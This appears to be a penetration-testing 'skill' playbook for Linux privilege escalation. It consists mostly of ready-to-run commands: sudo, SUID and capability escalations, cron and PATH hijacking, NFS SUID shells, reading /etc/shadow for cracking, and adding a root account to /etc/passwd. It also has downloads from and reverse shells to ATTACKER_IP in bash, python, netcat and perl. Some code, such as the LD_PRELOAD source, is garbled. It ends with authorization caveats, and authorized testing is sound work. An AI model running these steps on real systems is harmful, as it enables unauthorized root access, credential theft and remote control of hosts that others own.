Linux Privilege Escalation Purpose Execute systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses that allow elevation from low-privilege user access to root-level control. This skill enables comprehensive enumeration and exploitation of kernel vulnerabilities, sudo misconfigurations, SUID binaries, cron jobs, capabilities, PATH hijacking, and NFS weaknesses. Inputs / Prerequisites Required Access Low-privilege shell access to target Linux system Ability to execute commands (interactive or semi-interactive shell) Network access for reverse shell connections (if needed) Attacker machine for payload hosting and receiving shells Technical Requirements Understanding of Linux filesystem permissions and ownership Familiarity with common Linux utilities and scripting Knowledge of kernel versions and associated vulnerabilities Basic understanding of compilation (gcc) for custom exploits Recommended Tools LinPEAS, LinEnum, or Linux Smart Enumeration scripts Linux Exploit Suggester (LES) GTFOBins reference for binary exploitation John the Ripper or Hashcat for password cracking Netcat or similar for reverse shells Outputs / Deliverables Primary Outputs Root shell access on target system Privilege escalation path documentation System enumeration findings report Recommendations for remediation Evidence Artifacts Screenshots of successful privilege escalation Command output logs demonstrating root access Identified vulnerability details Exploited configuration files Core Workflow Phase 1: System Enumeration Basic System Information Gather fundamental system details for vulnerability research:
Hostname and system role
hostname
Kernel version and architecture
uname -a
Detailed kernel information
cat /proc/version
Operating system details
cat /etc/issue cat /etc/*-release
Architecture
arch User and Permission Enumeration
Current user context
whoami id
Users with login shells
cat /etc/passwd | grep -v nologin | grep -v false
Users with home directories
cat /etc/passwd | grep home
Group memberships
groups
Other logged-in users
w who Network Information
Network interfaces
ifconfig ip addr
Routing table
ip route
Active connections
netstat -antup ss -tulpn
Listening services
netstat -l Process and Service Enumeration
All running processes
ps aux ps -ef
Process tree view
ps axjf
Services running as root
ps aux | grep root Environment Variables
Full environment
env
PATH variable (for hijacking)
echo $PATH Phase 2: Automated Enumeration Deploy automated scripts for comprehensive enumeration:
LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
LinEnum
./LinEnum.sh -t
Linux Smart Enumeration
./lse.sh -l 1
Linux Exploit Suggester
./les.sh Transfer scripts to target system:
On attacker machine
python3 -m http.server 8000
On target machine
wget http://ATTACKER_IP:8000/linpeas.sh chmod +x linpeas.sh ./linpeas.sh Phase 3: Kernel Exploits Identify Kernel Version uname -r cat /proc/version Search for Exploits
Use Linux Exploit Suggester
./linux-exploit-suggester.sh
Manual search on exploit-db
searchsploit linux kernel [ version ] Common Kernel Exploits Kernel Version Exploit CVE 2.6.x - 3.x Dirty COW CVE-2016-5195 4.4.x - 4.13.x Double Fetch CVE-2017-16995 5.8+ Dirty Pipe CVE-2022-0847 Compile and Execute
Transfer exploit source
wget http://ATTACKER_IP/exploit.c
Compile on target
gcc exploit.c -o exploit
Execute
./exploit Phase 4: Sudo Exploitation Enumerate Sudo Privileges sudo -l GTFOBins Sudo Exploitation Reference https://gtfobins.github.io for exploitation commands:
Example: vim with sudo
sudo vim -c ':!/bin/bash'
Example: find with sudo
sudo find . -exec /bin/sh \ ; -quit
Example: awk with sudo
sudo awk 'BEGIN {system("/bin/bash")}'
Example: python with sudo
sudo python -c 'import os; os.system("/bin/bash")'
Example: less with sudo
sudo less /etc/passwd ! /bin/bash LD_PRELOAD Exploitation When env_keep includes LD_PRELOAD: // shell.c
include
include
include
Compile shared library
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
Execute with sudo
sudo LD_PRELOAD = /tmp/shell.so find Phase 5: SUID Binary Exploitation Find SUID Binaries find / -type f -perm -04000 -ls 2
/dev/null find / -perm -u = s -type f 2
/dev/null Exploit SUID Binaries Reference GTFOBins for SUID exploitation:
Example: base64 for file reading
LFILE
/etc/shadow base64 " $LFILE " | base64 -d
Example: cp for file writing
cp /bin/bash /tmp/bash chmod +s /tmp/bash /tmp/bash -p
Example: find with SUID
find . -exec /bin/sh -p \ ; -quit Password Cracking via SUID
Read shadow file (if base64 has SUID)
base64 /etc/shadow | base64 -d
shadow.txt base64 /etc/passwd | base64 -d
passwd.txt
On attacker machine
unshadow passwd.txt shadow.txt
hashes.txt john --wordlist = /usr/share/wordlists/rockyou.txt hashes.txt Add User to passwd (if nano/vim has SUID)
Generate password hash
openssl passwd -1 -salt new newpassword
Add to /etc/passwd (using SUID editor)
newuser: $1 $new $p7ptkEKU1HnaHpRtzNizS1 :0:0:root:/root:/bin/bash Phase 6: Capabilities Exploitation Enumerate Capabilities getcap -r / 2
/dev/null Exploit Capabilities
Example: python with cap_setuid
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Example: vim with cap_setuid
./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/bash", "bash", "-c", "reset; exec bash")'
Example: perl with cap_setuid
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";' Phase 7: Cron Job Exploitation Enumerate Cron Jobs
System crontab
cat /etc/crontab
User crontabs
ls -la /var/spool/cron/crontabs/
Cron directories
ls -la /etc/cron.*
Systemd timers
systemctl list-timers Exploit Writable Cron Scripts
Identify writable cron script from /etc/crontab
ls -la /opt/backup.sh
Check permissions
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'
/opt/backup.sh
If cron references non-existent script in writable PATH
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'
/home/user/antivirus.sh chmod +x /home/user/antivirus.sh Phase 8: PATH Hijacking
Find SUID binary calling external command
strings /usr/local/bin/suid-binary
Shows: system("service apache2 start")
Hijack by creating malicious binary in writable PATH
export PATH = /tmp: $PATH echo -e '#!/bin/bash\n/bin/bash -p'
/tmp/service chmod +x /tmp/service /usr/local/bin/suid-binary
Execute SUID binary
Phase 9: NFS Exploitation
On target - look for no_root_squash option
cat /etc/exports
On attacker - mount share and create SUID binary
showmount -e TARGET_IP mount -o rw TARGET_IP:/share /tmp/nfs
Create and compile SUID shell
echo 'int main(){setuid(0);setgid(0);system("/bin/bash");return 0;}'
/tmp/nfs/shell.c gcc /tmp/nfs/shell.c -o /tmp/nfs/shell && chmod +s /tmp/nfs/shell
On target - execute
/share/shell Quick Reference Enumeration Commands Summary Purpose Command Kernel version uname -a Current user id Sudo rights sudo -l SUID files find / -perm -u=s -type f 2>/dev/null Capabilities getcap -r / 2>/dev/null Cron jobs cat /etc/crontab Writable dirs find / -writable -type d 2>/dev/null NFS exports cat /etc/exports Reverse Shell One-Liners
Bash
bash -i
& /dev/tcp/ATTACKER_IP/4444 0
&1
Python
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
Netcat
nc -e /bin/bash ATTACKER_IP 4444
Perl
- perl
- -e
- 'use Socket;$i="ATTACKER_IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");'
- Key Resources
- GTFOBins:
- https://gtfobins.github.io
- LinPEAS:
- https://github.com/carlospolop/PEASS-ng
- Linux Exploit Suggester:
- https://github.com/mzet-/linux-exploit-suggester
- Constraints and Guardrails
- Operational Boundaries
- Verify kernel exploits in test environment before production use
- Failed kernel exploits may crash the system
- Document all changes made during privilege escalation
- Maintain access persistence only as authorized
- Technical Limitations
- Modern kernels may have exploit mitigations (ASLR, SMEP, SMAP)
- AppArmor/SELinux may restrict exploitation techniques
- Container environments limit kernel-level exploits
- Hardened systems may have restricted sudo configurations
- Legal and Ethical Requirements
- Written authorization required before testing
- Stay within defined scope boundaries
- Report critical findings immediately
- Do not access data beyond scope requirements
- Examples
- Example 1: Sudo to Root via find
- Scenario
- User has sudo rights for find command $ sudo -l User user may run the following commands: ( root ) NOPASSWD: /usr/bin/find $ sudo find . -exec /bin/bash \ ; -quit
id
uid
- 0
- (
- root
- )
- gid
- =
- 0
- (
- root
- )
- groups
- =
- 0
- (
- root
- )
- Example 2: SUID base64 for Shadow Access
- Scenario
- base64 binary has SUID bit set
$
find
/
-perm
-u
=
s
-type
f
2
/dev/null | grep base64 /usr/bin/base64 $ base64 /etc/shadow | base64 -d root: $6 $xyz .. .:18000:0:99999:7:::
Crack offline with john
- $ john
- --wordlist
- =
- rockyou.txt shadow.txt
- Example 3: Cron Job Script Hijacking
- Scenario
- Root cron job executes writable script
$
cat
/etc/crontab
* * * * * root /opt/scripts/backup.sh
$
ls
-la
/opt/scripts/backup.sh
-rwxrwxrwx
1
root root
50
/opt/scripts/backup.sh
$
echo
'cp /bin/bash /tmp/bash; chmod +s /tmp/bash'
/opt/scripts/backup.sh
Wait 1 minute
$ /tmp/bash -p
id
uid
1000 ( user ) gid = 1000 ( user ) euid = 0 ( root ) Troubleshooting Issue Solutions Exploit compilation fails Check for gcc: which gcc ; compile on attacker for same arch; use gcc -static Reverse shell not connecting Check firewall; try ports 443/80; use staged payloads; check egress filtering SUID binary not exploitable Verify version matches GTFOBins; check AppArmor/SELinux; some binaries drop privileges Cron job not executing Verify cron running: service cron status ; check +x permissions; verify PATH in crontab When to Use This skill is applicable to execute the workflow or actions described in the overview.